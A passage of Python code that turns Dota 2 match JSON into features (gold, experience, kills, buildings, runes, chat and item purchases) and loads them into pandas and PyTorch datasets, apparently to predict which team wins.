'npc_dota_hero_broodmother': 61,\n 'npc_dota_hero_bounty_hunter': 62,\n 'npc_dota_hero_weaver': 63,\n 'npc_dota_hero_jakiro': 64,\n 'npc_dota_hero_batrider': 65,\n 'npc_dota_hero_chen': 66,\n 'npc_dota_hero_spectre': 67,\n 'npc_dota_hero_doom_bringer': 69,\n 'npc_dota_hero_ancient_apparition': 68,\n 'npc_dota_hero_ursa': 70,\n 'npc_dota_hero_spirit_breaker': 71,\n 'npc_dota_hero_gyrocopter': 72,\n 'npc_dota_hero_alchemist': 73,\n 'npc_dota_hero_invoker': 74,\n 'npc_dota_hero_silencer': 75,\n 'npc_dota_hero_obsidian_destroyer': 76,\n 'npc_dota_hero_lycan': 77,\n 'npc_dota_hero_brewmaster': 78,\n 'npc_dota_hero_shadow_demon': 79,\n 'npc_dota_hero_lone_druid': 80,\n 'npc_dota_hero_chaos_knight': 81,\n 'npc_dota_hero_meepo': 82,\n 'npc_dota_hero_treant': 83,\n 'npc_dota_hero_ogre_magi': 84,\n 'npc_dota_hero_undying': 85,\n 'npc_dota_hero_rubick': 86,\n 'npc_dota_hero_disruptor': 87,\n 'npc_dota_hero_nyx_assassin': 88,\n 'npc_dota_hero_naga_siren': 89,\n 'npc_dota_hero_keeper_of_the_light': 90,\n 'npc_dota_hero_wisp': 91,\n 'npc_dota_hero_visage': 92,\n 'npc_dota_hero_slark': 93,\n 'npc_dota_hero_medusa': 94,\n 'npc_dota_hero_troll_warlord': 95,\n 'npc_dota_hero_centaur': 96,\n 'npc_dota_hero_magnataur': 97,\n 'npc_dota_hero_shredder': 98,\n 'npc_dota_hero_bristleback': 99,\n 'npc_dota_hero_tusk': 100,\n 'npc_dota_hero_skywrath_mage': 101,\n 'npc_dota_hero_abaddon': 102,\n 'npc_dota_hero_elder_titan': 103,\n 'npc_dota_hero_legion_commander': 104,\n 'npc_dota_hero_ember_spirit': 106,\n 'npc_dota_hero_earth_spirit': 107,\n 'npc_dota_hero_terrorblade': 109,\n 'npc_dota_hero_phoenix': 110,\n 'npc_dota_hero_oracle': 111,\n 'npc_dota_hero_techies': 105,\n 'npc_dota_hero_target_dummy': 127,\n 'npc_dota_hero_winter_wyvern': 112,\n 'npc_dota_hero_arc_warden': 113,\n 'npc_dota_hero_abyssal_underlord': 108,\n 'npc_dota_hero_monkey_king': 114,\n 'npc_dota_hero_pangolier': 120,\n 'npc_dota_hero_dark_willow': 119,\n 'npc_dota_hero_grimstroke': 121\n}\n\nitems_list = [\n 'aegis',\n 'courier',\n 'boots_of_elves',\n 'belt_of_strength',\n 'blade_of_alacrity',\n 'blades_of_attack',\n 'blight_stone',\n 'blink',\n 'boots',\n 'bottle',\n 'broadsword',\n 'chainmail',\n 'cheese',\n 'circlet',\n 'clarity',\n 'claymore',\n 'cloak',\n 'demon_edge',\n 'dust',\n 'eagle',\n 'enchanted_mango',\n 'energy_booster',\n 'faerie_fire',\n 'flying_courier',\n 'gauntlets',\n 'gem',\n 'ghost',\n 'gloves',\n 'flask',\n 'helm_of_iron_will',\n 'hyperstone',\n 'infused_raindrop',\n 'branches',\n 'javelin',\n 'magic_stick',\n 'mantle',\n 'mithril_hammer',\n 'lifesteal',\n 'mystic_staff',\n 'ward_observer',\n 'ogre_axe',\n 'orb_of_venom',\n 'platemail',\n 'point_booster',\n 'quarterstaff',\n 'quelling_blade',\n 'reaver',\n 'refresher_shard',\n 'ring_of_health',\n 'ring_of_protection',\n 'ring_of_regen',\n 'robe',\n 'relic',\n 'sobi_mask',\n 'ward_sentry',\n 'shadow_amulet',\n 'slippers',\n 'smoke_of_deceit',\n 'staff_of_wizardry',\n 'stout_shield',\n 'talisman_of_evasion',\n 'tango',\n 'tango_single',\n 'tome_of_knowledge',\n 'tpscroll',\n 'ultimate_orb',\n 'vitality_booster',\n 'void_stone',\n 'wind_lace',\n]\n\n\ndef get_lv_from_total_xp(xp):\n return sum(1 for req in lv_xp_req if xp >= req)\n\n\ndef chatwheel_count(m, player, t):\n return sum(\n 1 for c in m['chat'] if c['type'] == 'chatwheel' and 'slot' in c and c['slot'] == player and c['time'] < t * 60)\n\n\ndef chat_count(m, player, t):\n return sum(\n 1 for c in m['chat'] if c['type'] == 'chat' and 'slot' in c and c['slot'] == player and c['time'] < t * 60)\n\n\ndef purchase_states_array(m, items, t):\n item2id = {}\n for i, j in enumerate(items):\n item2id[j] = i\n r = torch.zeros(10, len(items))\n for i in range(10):\n for j in m['players'][i]['purchase_log']:\n if j['time'] < t * 60 and j['key'] in item2id:\n r[i, item2id[j['key']]] += 1\n return r\n\n\ndef purchase_states_dict(m, items, t):\n r = {}\n for i in items:\n for j in range(5):\n r[f\"purchase_{i}_0_{j}\"] = 0\n for j in range(5, 10):\n r[f\"purchase_{i}_1_{j - 5}\"] = 0\n for j in range(5):\n for k in m['players'][j]['purchase_log']:\n if k['time'] < t * 60:\n for h in items:\n if k['key'] == h:\n r[f\"purchase_{h}_0_{j}\"] += 1\n for j in range(5, 10):\n for k in m['players'][j]['purchase_log']:\n if k['time'] < t * 60:\n for h in items:\n if k['key'] == h:\n r[f\"purchase_{h}_1_{j - 5}\"] += 1\n for i in items:\n for j, v in enumerate(sorted([r[f\"purchase_{i}_0_{j}\"] for j in range(5)])):\n r[f\"purchase_{i}_0_{j}\"] = v\n for j, v in enumerate(sorted([r[f\"purchase_{i}_1_{j - 5}\"] for j in range(5, 10)])):\n r[f\"purchase_{i}_1_{j}\"] = v\n return r\n\n\ndef building_id(s):\n if s.startswith('npc_dota_goodguys_'):\n pos = 0\n elif s.startswith('npc_dota_badguys_'):\n pos = 17\n else:\n raise Exception(\"tower key \" + s + \" not recognized\")\n if s.endswith('tower1_mid'):\n return pos + 0\n elif s.endswith('tower1_bot'):\n return pos + 1\n elif s.endswith('tower1_top'):\n return pos + 2\n elif s.endswith('tower2_mid'):\n return pos + 3\n elif s.endswith('tower2_bot'):\n return pos + 4\n elif s.endswith('tower2_top'):\n return pos + 5\n elif s.endswith('tower3_mid'):\n return pos + 6\n elif s.endswith('tower3_bot'):\n return pos + 7\n elif s.endswith('tower3_top'):\n return pos + 8\n elif s.endswith('melee_rax_mid'):\n return pos + 9\n elif s.endswith('range_rax_mid'):\n return pos + 10\n elif s.endswith('melee_rax_bot'):\n return pos + 11\n elif s.endswith('range_rax_bot'):\n return pos + 12\n elif s.endswith('melee_rax_top'):\n return pos + 13\n elif s.endswith('range_rax_top'):\n return pos + 14\n elif s.endswith('healers'):\n return pos + 15\n elif s.endswith('tower4'):\n return pos + 16\n elif s.endswith('fort'):\n return -1\n else:\n raise Exception('unrecognized key ' + s)\n\n\ndef building_states_array(m, t):\n r = torch.ones(34)\n r[building_id('npc_dota_goodguys_healers')] += 1\n r[building_id('npc_dota_goodguys_tower4')] += 1\n r[building_id('npc_dota_badguys_healers')] += 1\n r[building_id('npc_dota_badguys_tower4')] += 1\n for o in m['objectives']:\n if o['type'] == 'building_kill' and o['time'] < t * 60:\n bid = building_id(o['key'])\n if bid != -1:\n r[bid] -= 1\n return r\n\n\ndef building_states_dict(m, t):\n r = {}\n blst = ([f\"tower{i}_{j}\" for i in range(1, 4) for j in ['mid', 'bot', 'top']] +\n [f\"{i}_rax_{j}\" for i in ['melee', 'range'] for j in ['mid', 'bot', 'top']] +\n ['healers', 'tower4', 'fort'])\n for i in [0, 1]:\n for j in blst:\n r[f\"building_{i}_{j}\"] = 1\n r[f\"building_{i}_tower4\"] += 1\n r[f\"building_{i}_healers\"] += 1\n for o in m['objectives']:\n if o['type'] == 'building_kill' and o['time'] < t * 60:\n if o['key'].startswith('npc_dota_goodguys_'):\n pos = 0\n elif o['key'].startswith('npc_dota_badguys_'):\n pos = 1\n else:\n raise Exception(\"tower key \" + o['key'] + \" not recognized\")\n for j in blst:\n if o['key'].endswith(j):\n r[f\"building_{pos}_{j}\"] -= 1\n return r\n\n\ndef player_kill_count(json_obj, player_slot, time):\n for p in json_obj['players']:\n if p['player_slot'] == player_slot:\n kc = 0\n for k in p['kills_log']:\n if k['time'] < time:\n kc += 1\n return kc\n raise ValueError('Bad player slot')\n\n\ndef player_death_count(json_obj, player_slot, time):\n target_hero_id = -1\n for p in json_obj['players']:\n if p['player_slot'] == player_slot:\n target_hero_id = p['hero_id']\n break\n if target_hero_id == -1:\n raise ValueError('Bad player slot')\n kc = 0\n for p in json_obj['players']:\n for k in p['kills_log']:\n if k['time'] < time and hero2id[k['key']] == target_hero_id:\n kc += 1\n return kc\n\n\ndef _runes_count(m, player, t):\n r = np.zeros(7)\n for i in m['players'][player]['runes_log']:\n if i['time'] < t * 60:\n for j in range(7):\n if j == i['key']:\n r[j] += 1\n return r\n\n\ndef rune_states_dict(m, t):\n l0 = np.stack([_runes_count(m, i, t) for i in range(5)]).T\n l1 = np.stack([_runes_count(m, i, t) for i in range(5, 10)]).T\n l0 = np.sort(l0, axis=1)\n l1 = np.sort(l1, axis=1)\n r = {}\n for j in range(7):\n for i in range(5):\n r[f\"rune_{j}_0_{i}\"] = l0[j, i]\n for j in range(7):\n for i in range(5):\n r[f\"rune_{j}_1_{i}\"] = l1[j, i]\n return r\n\n\nclass _FileLoader:\n def __init__(self, path_data):\n self.path_data = path_data\n\n def __call__(self, match_id):\n path_file = os.path.join(self.path_data, f\"{match_id}.json\")\n lst = []\n with open(path_file, mode='r', encoding='utf-8') as f:\n m = json.load(f)\n # Extract slices of 10%, 20%, ..., 90% of the time of a match.\n for pct in [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]:\n t = int(m['duration'] * pct / 60)\n mm = {\n 'result': 1 - int(m['radiant_win'])\n }\n for i in range(5):\n assert (m['players'][i]['player_slot'] == i)\n assert (m['players'][i + 5]['player_slot'] == i + 128)\n for i in range(121):\n mm[f'heroes_0_has_{i}'] = 0\n mm[f'heroes_1_has_{i}'] = 0\n for i in range(5):\n mm[f\"heroes_0_has_{m['players'][i]['hero_id'] - 1}\"] = 1\n for i in range(5, 10):\n mm[f\"heroes_1_has_{m['players'][i]['hero_id'] - 1}\"] = 1\n for i, v in enumerate(sorted([m['players'][i]['gold_t'][t] for i in range(5)])):\n mm[f\"gold_0_{i}\"] = v\n for i, v in enumerate(sorted([m['players'][i]['gold_t'][t] for i in range(5, 10)])):\n mm[f\"gold_1_{i}\"] = v\n for i, v in enumerate(sorted([m['players'][i]['xp_t'][t] for i in range(5)])):\n mm[f\"xp_0_{i}\"] = v\n for i, v in enumerate(sorted([m['players'][i]['xp_t'][t] for i in range(5, 10)])):\n mm[f\"xp_1_{i}\"] = v\n for i, v in enumerate(sorted([get_lv_from_total_xp(m['players'][i]['xp_t'][t])\n for i in range(5)])):\n mm[f\"lv_0_{i}\"] = v\n for i, v in enumerate(sorted([get_lv_from_total_xp(m['players'][i]['xp_t'][t])\n for i in range(5, 10)])):\n mm[f\"lv_1_{i}\"] = v\n for i, v in enumerate(sorted([m['players'][i]['lh_t'][t] for i in range(5)])):\n mm[f\"lh_0_{i}\"] = v\n for i, v in enumerate(sorted([m['players'][i]['lh_t'][t] for i in range(5, 10)])):\n mm[f\"lh_1_{i}\"] = v\n for i, v in enumerate(sorted([m['players'][i]['dn_t'][t] for i in range(5)])):\n mm[f\"dn_0_{i}\"] = v\n for i, v in enumerate(sorted([m['players'][i]['dn_t'][t] for i in range(5, 10)])):\n mm[f\"dn_1_{i}\"] = v\n for i, v in enumerate(sorted([sum(1 for it in m['players'][i]['obs_log'] if it['time'] < t * 60)\n for i in range(5)])):\n mm[f\"obs_0_{i}\"] = v\n for i, v in enumerate(sorted([sum(1 for it in m['players'][i]['obs_log'] if it['time'] < t * 60)\n for i in range(5, 10)])):\n mm[f\"obs_1_{i}\"] = v\n for i, v in enumerate(sorted([sum(1 for it in m['players'][i]['sen_log'] if it['time'] < t * 60)\n for i in range(5)])):\n mm[f\"sen_0_{i}\"] = v\n for i, v in enumerate(sorted([sum(1 for it in m['players'][i]['sen_log'] if it['time'] < t * 60)\n for i in range(5, 10)])):\n mm[f\"sen_1_{i}\"] = v\n for i, v in enumerate(sorted([sum(1 for it in m['players'][i]['kills_log'] if it['time'] < t * 60)\n for i in range(5)])):\n mm[f\"kills_0_{i}\"] = v\n for i, v in enumerate(sorted([sum(1 for it in m['players'][i]['kills_log'] if it['time'] < t * 60)\n for i in range(5, 10)])):\n mm[f\"kills_1_{i}\"] = v\n for i, v in enumerate(sorted([player_death_count(m, i, t * 60) for i in range(5)])):\n mm[f\"deaths_0_{i}\"] = v\n for i, v in enumerate(sorted([player_death_count(m, i, t * 60) for i in range(128, 128 + 5)])):\n mm[f\"deaths_1_{i}\"] = v\n for i, v in enumerate(sorted([sum(tf['players'][i]['damage']\n for tf in m['teamfights'] if tf['end'] < t * 60)\n for i in range(5)])):\n mm[f\"tf_damage_0_{i}\"] = v\n for i, v in enumerate(sorted([sum(tf['players'][i]['damage']\n for tf in m['teamfights'] if tf['end'] < t * 60)\n for i in range(5, 10)])):\n mm[f\"tf_damage_1_{i}\"] = v\n for k, v in building_states_dict(m, t).items():\n mm[k] = v\n for i, v in enumerate(sorted([chatwheel_count(m, i, t) for i in range(5)])):\n mm[f\"chatwheel_0_{i}\"] = v\n for i, v in enumerate(sorted([chatwheel_count(m, i, t) for i in range(5, 10)])):\n mm[f\"chatwheel_1_{i}\"] = v\n for i, v in enumerate(sorted([chat_count(m, i, t) for i in range(5)])):\n mm[f\"chat_0_{i}\"] = v\n for i, v in enumerate(sorted([chat_count(m, i, t) for i in range(5, 10)])):\n mm[f\"chat_1_{i}\"] = v\n for i, v in enumerate(sorted([chatwheel_count(m, i, t) + chat_count(m, i, t)\n for i in range(5)])):\n mm[f\"chat_total_0_{i}\"] = v\n for i, v in enumerate(sorted([chatwheel_count(m, i, t) + chat_count(m, i, t)\n for i in range(5, 10)])):\n mm[f\"chat_total_1_{i}\"] = v\n mm['roshan_0'] = sum(1 for o in m['objectives']\n if o['type'] == 'CHAT_MESSAGE_ROSHAN_KILL'\n and o['time'] < t * 60 and o['team'] == 2)\n mm['roshan_1'] = sum(1 for o in m['objectives']\n if o['type'] == 'CHAT_MESSAGE_ROSHAN_KILL'\n and o['time'] < t * 60 and o['team'] == 3)\n mm['time'] = t\n for k, v in purchase_states_dict(m, items_list, t).items():\n mm[k] = v\n for k, v in rune_states_dict(m, t).items():\n mm[k] = v\n mm['pred_vict_0'] = sum(m['players'][i]['pred_vict'] for i in range(5))\n mm['pred_vict_1'] = sum(m['players'][i]['pred_vict'] for i in range(5, 10))\n for i, v in enumerate(sorted([sum(1 for b in m['players'][i]['buyback_log'] if b['time'] < t * 60)\n for i in range(5)])):\n mm[f\"buyback_0_{i}\"] = v\n for i, v in enumerate(sorted([sum(1 for b in m['players'][i]['buyback_log'] if b['time'] < t * 60)\n for i in range(5, 10)])):\n mm[f\"buyback_1_{i}\"] = v\n mm['region'] = m['region']\n\n # derivatives (total)\n mm[\"gold_0_total\"] = sum(m['players'][i]['gold_t'][t] for i in range(5))\n mm[\"gold_1_total\"] = sum(m['players'][i]['gold_t'][t] for i in range(5, 10))\n mm[\"xp_0_total\"] = sum(m['players'][i]['xp_t'][t] for i in range(5))\n mm[\"xp_1_total\"] = sum(m['players'][i]['xp_t'][t] for i in range(5, 10))\n mm[\"lh_0_total\"] = sum(m['players'][i]['lh_t'][t] for i in range(5))\n mm[\"lh_1_total\"] = sum(m['players'][i]['lh_t'][t] for i in range(5, 10))\n mm[\"dn_0_total\"] = sum(m['players'][i]['dn_t'][t] for i in range(5))\n mm[\"dn_1_total\"] = sum(m['players'][i]['dn_t'][t] for i in range(5, 10))\n mm[\"obs_0_total\"] = sum(\n sum(1 for it in m['players'][i]['obs_log'] if it['time'] < t * 60) for i in range(5))\n mm[\"obs_1_total\"] = sum(\n sum(1 for it in m['players'][i]['obs_log'] if it['time'] < t * 60) for i in range(5, 10))\n mm[\"sen_0_total\"] = sum(\n sum(1 for it in m['players'][i]['sen_log'] if it['time'] < t * 60) for i in range(5))\n mm[\"sen_1_total\"] = sum(\n sum(1 for it in m['players'][i]['sen_log'] if it['time'] < t * 60) for i in range(5, 10))\n mm[\"kills_0_total\"] = sum(\n sum(1 for it in m['players'][i]['kills_log'] if it['time'] < t * 60) for i in range(5))\n mm[\"kills_1_total\"] = sum(\n sum(1 for it in m['players'][i]['kills_log'] if it['time'] < t * 60) for i in range(5, 10))\n mm[\"chatwheel_0_total\"] = sum(chatwheel_count(m, i, t) for i in range(5))\n mm[\"chatwheel_1_total\"] = sum(chatwheel_count(m, i, t) for i in range(5, 10))\n mm[\"rune_0_total\"] = sum(mm[f\"rune_{j}_0_{i}\"] for j in range(7) for i in range(5))\n mm[\"rune_1_total\"] = sum(mm[f\"rune_{j}_1_{i}\"] for j in range(7) for i in range(5))\n mm[\"buyback_0_total\"] = sum(\n sum(1 for b in m['players'][i]['buyback_log'] if b['time'] < t * 60) for i in range(5))\n mm[\"buyback_1_total\"] = sum(\n sum(1 for b in m['players'][i]['buyback_log'] if b['time'] < t * 60) for i in range(5, 10))\n\n # derivatives (diff)\n mm['pred_vict_diff'] = mm['pred_vict_0'] - mm['pred_vict_1']\n mm['buyback_diff'] = mm['buyback_0_total'] - mm['buyback_1_total']\n\n # derivatives (ratio)\n for i, v in enumerate(sorted([m['players'][i]['gold_t'][t] for i in range(5)])):\n mm[f\"gold_0_ratio_{i}\"] = (v + 1) / (mm[\"gold_0_total\"] + mm[\"gold_1_total\"] + 10)\n for i, v in enumerate(sorted([m['players'][i]['gold_t'][t] for i in range(5, 10)])):\n mm[f\"gold_1_ratio_{i}\"] = (v + 1) / (mm[\"gold_0_total\"] + mm[\"gold_1_total\"] + 10)\n for i, v in enumerate(sorted([m['players'][i]['xp_t'][t] for i in range(5)])):\n mm[f\"xp_0_ratio_{i}\"] = (v + 1) / (mm[\"xp_0_total\"] + mm[\"xp_1_total\"] + 10)\n for i, v in enumerate(sorted([m['players'][i]['xp_t'][t] for i in range(5, 10)])):\n mm[f\"xp_1_ratio_{i}\"] = (v + 1) / (mm[\"xp_0_total\"] + mm[\"xp_1_total\"] + 10)\n for i, v in enumerate(sorted([m['players'][i]['lh_t'][t] for i in range(5)])):\n mm[f\"lh_0_ratio_{i}\"] = (v + 1) / (mm[\"lh_0_total\"] + mm[\"lh_1_total\"] + 10)\n for i, v in enumerate(sorted([m['players'][i]['lh_t'][t] for i in range(5, 10)])):\n mm[f\"lh_1_ratio_{i}\"] = (v + 1) / (mm[\"lh_0_total\"] + mm[\"lh_1_total\"] + 10)\n for i, v in enumerate(sorted([m['players'][i]['dn_t'][t] for i in range(5)])):\n mm[f\"dn_0_ratio_{i}\"] = (v + 1) / (mm[\"dn_0_total\"] + mm[\"dn_1_total\"] + 10)\n for i, v in enumerate(sorted([m['players'][i]['dn_t'][t] for i in range(5, 10)])):\n mm[f\"dn_1_ratio_{i}\"] = (v + 1) / (mm[\"dn_0_total\"] + mm[\"dn_1_total\"] + 10)\n mm[\"gold_ratio_total\"] = (mm[\"gold_0_total\"] + 1) / (mm[\"gold_0_total\"] + mm[\"gold_1_total\"] + 2)\n mm[\"xp_ratio_total\"] = (mm[\"xp_0_total\"] + 1) / (mm[\"xp_0_total\"] + mm[\"xp_1_total\"] + 2)\n mm[\"lh_ratio_total\"] = (mm[\"lh_0_total\"] + 1) / (mm[\"lh_0_total\"] + mm[\"lh_1_total\"] + 2)\n mm[\"dn_ratio_total\"] = (mm[\"dn_0_total\"] + 1) / (mm[\"dn_0_total\"] + mm[\"dn_1_total\"] + 2)\n mm[\"obs_ratio\"] = (mm[\"obs_0_total\"] + 1) / (mm[\"obs_0_total\"] + mm[\"obs_1_total\"] + 2)\n mm[\"sen_ratio\"] = (mm[\"sen_0_total\"] + 1) / (mm[\"sen_0_total\"] + mm[\"sen_1_total\"] + 2)\n mm[\"kill_ratio\"] = (mm[\"kills_0_total\"] + 1) / (mm[\"kills_0_total\"] + mm[\"kills_1_total\"] + 2)\n mm[\"chatwheel_ratio\"] = (mm[\"chatwheel_0_total\"] + 1) / (\n mm[\"chatwheel_0_total\"] + mm[\"chatwheel_1_total\"] + 2)\n mm[\"rune_ratio\"] = (mm[\"rune_0_total\"] + 1) / (mm[\"rune_0_total\"] + mm[\"rune_1_total\"] + 2)\n\n # derivatives (delta)\n for i, v in enumerate(sorted(\n [m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 1, 0)] for i in\n range(5)])):\n mm[f\"gold_delta1_0_{i}\"] = v\n for i, v in enumerate(sorted(\n [m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 1, 0)] for i in\n range(5, 10)])):\n mm[f\"gold_delta1_1_{i}\"] = v\n for i, v in enumerate(sorted(\n [m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 5, 0)] for i in\n range(5)])):\n mm[f\"gold_delta5_0_{i}\"] = v\n for i, v in enumerate(sorted(\n [m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 5, 0)] for i in\n range(5, 10)])):\n mm[f\"gold_delta5_1_{i}\"] = v\n for i, v in enumerate(sorted(\n [m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 1, 0)] for i in range(5)])):\n mm[f\"xp_delta1_0_{i}\"] = v\n for i, v in enumerate(sorted(\n [m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 1, 0)] for i in\n range(5, 10)])):\n mm[f\"xp_delta1_1_{i}\"] = v\n for i, v in enumerate(sorted(\n [m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 5, 0)] for i in range(5)])):\n mm[f\"xp_delta5_0_{i}\"] = v\n for i, v in enumerate(sorted(\n [m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 5, 0)] for i in\n range(5, 10)])):\n mm[f\"xp_delta5_1_{i}\"] = v\n mm[\"obs_delta6_0\"] = sum(\n sum(1 for it in m['players'][i]['obs_log'] if (t - 6) * 60 <= it['time'] < t * 60) for i in\n range(5))\n mm[\"obs_delta6_1\"] = sum(\n sum(1 for it in m['players'][i]['obs_log'] if (t - 6) * 60 <= it['time'] < t * 60) for i in\n range(5, 10))\n mm[\"sen_delta6_0\"] = sum(\n sum(1 for it in m['players'][i]['sen_log'] if (t - 6) * 60 <= it['time'] < t * 60) for i in\n range(5))\n mm[\"sen_delta6_1\"] = sum(\n sum(1 for it in m['players'][i]['sen_log'] if (t - 6) * 60 <= it['time'] < t * 60) for i in\n range(5, 10))\n\n # derivatives (delta_total)\n mm[\"gold_delta1_total_0\"] = sum(\n m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 1, 0)] for i in range(5))\n mm[\"gold_delta1_total_1\"] = sum(\n m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 1, 0)] for i in range(5, 10))\n mm[\"gold_delta5_total_0\"] = sum(\n m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 5, 0)] for i in range(5))\n mm[\"gold_delta5_total_1\"] = sum(\n m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 5, 0)] for i in range(5, 10))\n mm[\"xp_delta1_total_0\"] = sum(\n m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 1, 0)] for i in range(5))\n mm[\"xp_delta1_total_1\"] = sum(\n m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 1, 0)] for i in range(5, 10))\n mm[\"xp_delta5_total_0\"] = sum(\n m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 5, 0)] for i in range(5))\n mm[\"xp_delta5_total_1\"] = sum(\n m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 5, 0)] for i in range(5, 10))\n\n # derivatives (delta_ratio)\n mm[\"gold_delta1_ratio_total\"] = (mm[\"gold_delta1_total_0\"] + 1) / (\n mm[\"gold_delta1_total_0\"] + mm[\"gold_delta1_total_1\"] + 2)\n mm[\"gold_delta5_ratio_total\"] = (mm[\"gold_delta5_total_0\"] + 1) / (\n mm[\"gold_delta5_total_0\"] + mm[\"gold_delta5_total_1\"] + 2)\n mm[\"xp_delta1_ratio_total\"] = (mm[\"xp_delta1_total_0\"] + 1) / (\n mm[\"xp_delta1_total_0\"] + mm[\"xp_delta1_total_1\"] + 2)\n mm[\"xp_delta5_ratio_total\"] = (mm[\"xp_delta5_total_0\"] + 1) / (\n mm[\"xp_delta5_total_0\"] + mm[\"xp_delta5_total_1\"] + 2)\n\n # derivatives (mean)\n for i, v in enumerate(\n sorted([0 if t == 0 else m['players'][i]['gold_t'][t] / t for i in range(5)])):\n mm[f\"gpm_0_{i}\"] = v\n for i, v in enumerate(\n sorted([0 if t == 0 else m['players'][i]['gold_t'][t] / t for i in range(5, 10)])):\n mm[f\"gpm_1_{i}\"] = v\n for i, v in enumerate(sorted([0 if t == 0 else m['players'][i]['xp_t'][t] / t for i in range(5)])):\n mm[f\"xpm_0_{i}\"] = v\n for i, v in enumerate(\n sorted([0 if t == 0 else m['players'][i]['xp_t'][t] / t for i in range(5, 10)])):\n mm[f\"xpm_1_{i}\"] = v\n\n # derivatives (variation)\n mm[\"gold_variation_0\"] = stats.variation([m['players'][i]['gold_t'][t] + 1.0 for i in range(5)])\n mm[\"gold_variation_1\"] = stats.variation([m['players'][i]['gold_t'][t] + 1.0 for i in range(5, 10)])\n mm[\"xp_variation_0\"] = stats.variation([m['players'][i]['xp_t'][t] + 1.0 for i in range(5)])\n mm[\"xp_variation_1\"] = stats.variation([m['players'][i]['xp_t'][t] + 1.0 for i in range(5, 10)])\n\n lst.append(mm)\n return pandas.DataFrame(lst)\n\n\ndef load_as_data_frame(path_data, sets=('train', 'valid', 'test')):\n lst = {}\n for s in sets:\n lst[s] = []\n\n for path_match in tqdm(os.listdir(path_data)):\n if _check_path_match(path_match) in sets and os.path.isfile(os.path.join(path_data, path_match)):\n lst[_check_path_match(path_match)].append(int(path_match[:-5]))\n\n if 'test' in sets:\n li = lst['test']\n df = {}\n with Pool(12) as pool:\n for s in sets:\n df[s] = pandas.concat(pool.map(_FileLoader(path_data), np.array(lst[s]), chunksize=256), ignore_index=True)\n df[s].region = df[s].region.astype('category')\n del lst[s]\n del lst\n\n if 'test' in sets:\n return df, li\n else:\n return df\n\n\nclass DotaData(Dataset):\n def __init__(self, path_data, mode, transform=None):\n self.path_data = []\n self.mode = mode\n for path_match in tqdm(os.listdir(path_data)):\n if os.path.isfile(os.path.join(path_data, path_match)):\n if _check_path_match(path_match) == mode:\n self.path_data.append(os.path.join(path_data, path_match))\n self.transform = transform\n\n def __len__(self):\n return len(self.path_data)\n\n def __getitem__(self, index):\n with open(self.path_data[index], mode='r', encoding='utf-8') as f:\n m = json.load(f)\n if self.transform is not None:\n m = self.transform(m)\n return m\n\n @staticmethod\n def extract_match(m):\n si, sg, e = [], [], []\n hero = torch.LongTensor([m['players'][i]['hero_id'] - 1 for i in range(10)])\n for t in range(len(m['players'][0]['gold_t'])):\n ll = []\n\n gold = torch.FloatTensor([m['players'][i]['gold_t'][t] for i in range(10)])\n ll.append(gold.view(10, 1))\n xp = torch.FloatTensor([m['players'][i]['xp_t'][t] for i in range(10)])\n ll.append(xp.view(10, 1))\n lh = torch.FloatTensor([m['players'][i]['lh_t'][t] for i in range(10)])\n ll.append(lh.view(10, 1))\n dn = torch.FloatTensor([m['players'][i]['dn_t'][t] for i in range(10)])\n ll.append(dn.view(10, 1))\n lv = torch.FloatTensor([get_lv_from_total_xp(m['players'][i]['xp_t'][t]) for i in range(10)])\n ll.append(lv.view(10, 1))\n chatwheel = torch.FloatTensor([chatwheel_count(m, i, t) for i in range(10)])\n ll.append(chatwheel.view(10, 1))\n chat = torch.FloatTensor([chat_count(m, i, t) for i in range(10)])\n ll.append(chat.view(10, 1))\n pred_vict = torch.FloatTensor([int(m['players'][i]['pred_vict']) for i in range(10)])\n ll.append(pred_vict.view(10, 1))\n purchase = purchase_states_array(m, items_list, t)\n ll.append(purchase)\n rune5 = torch.FloatTensor(\n [sum(1 for r in m['players'][i]['runes_log'] if r['key'] == 5 and r['time'] < t * 60) for i in\n range(10)])\n ll.append(rune5.view(10, 1))\n\n gold_ratio = (gold + 1.0) / (gold.sum() + 10.0)\n ll.append(gold_ratio.view(10, 1))\n xp_ratio = (xp + 1.0) / (xp.sum() + 10.0)\n ll.append(xp_ratio.view(10, 1))\n lh_ratio = (lh + 1.0) / (lh.sum() + 10.0)\n ll.append(lh_ratio.view(10, 1))\n dn_ratio = (dn + 1.0) / (dn.sum() + 10.0)\n ll.append(dn_ratio.view(10, 1))\n\n gold_delta1 = torch.FloatTensor(\n [m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 1, 0)] for i in range(10)])\n ll.append(gold_delta1.view(10, 1))\n xp_delta1 = torch.FloatTensor(\n [m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 1, 0)] for i in range(10)])\n ll.append(xp_delta1.view(10, 1))\n gold_delta5 = torch.FloatTensor(\n [m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 5, 0)] for i in range(10)])\n ll.append(gold_delta5.view(10, 1))\n xp_delta5 = torch.FloatTensor(\n [m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 5, 0)] for i in range(10)])\n ll.append(xp_delta5.view(10, 1))\n\n gpm = torch.FloatTensor([0 if t == 0 else m['players'][i]['gold_t'][t] / t for i in range(10)])\n ll.append(gpm.view(10, 1))\n xpm = torch.FloatTensor([0 if t == 0 else m['players'][i]['xp_t'][t] / t for i in range(10)])\n ll.append(xpm.view(10, 1))\n\n si.append(torch.cat(ll, dim=1))\n\n ll = []\n\n chatwheel_total = torch.FloatTensor([\n 